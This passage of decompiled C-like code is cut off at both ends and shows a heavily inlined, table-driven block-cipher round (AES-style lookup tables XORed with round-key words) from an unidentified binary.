((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x413dc8 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (( *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x413dc8 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x18) * 4) ^  *(0x413dc8 + (_t224 & 0x000000ff) * 4) ^ _t242[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x413dc8 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x413dc8 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (( *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x413dc8 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x18) * 4) ^  *(0x413dc8 + (_t224 & 0x000000ff) * 4) ^ _t242[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (( *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x413dc8 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x413dc8 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (( *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x413dc8 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x18) * 4) ^  *(0x413dc8 + (_t224 & 0x000000ff) * 4) ^ _t242[2]) >> 0x18) * 4) ^  *(0x413dc8 + (_t158 & 0x000000ff) * 4) ^ _t242[3];
							_t236 = _t236 - 0x20;
							_t163 =  *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x413dc8 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 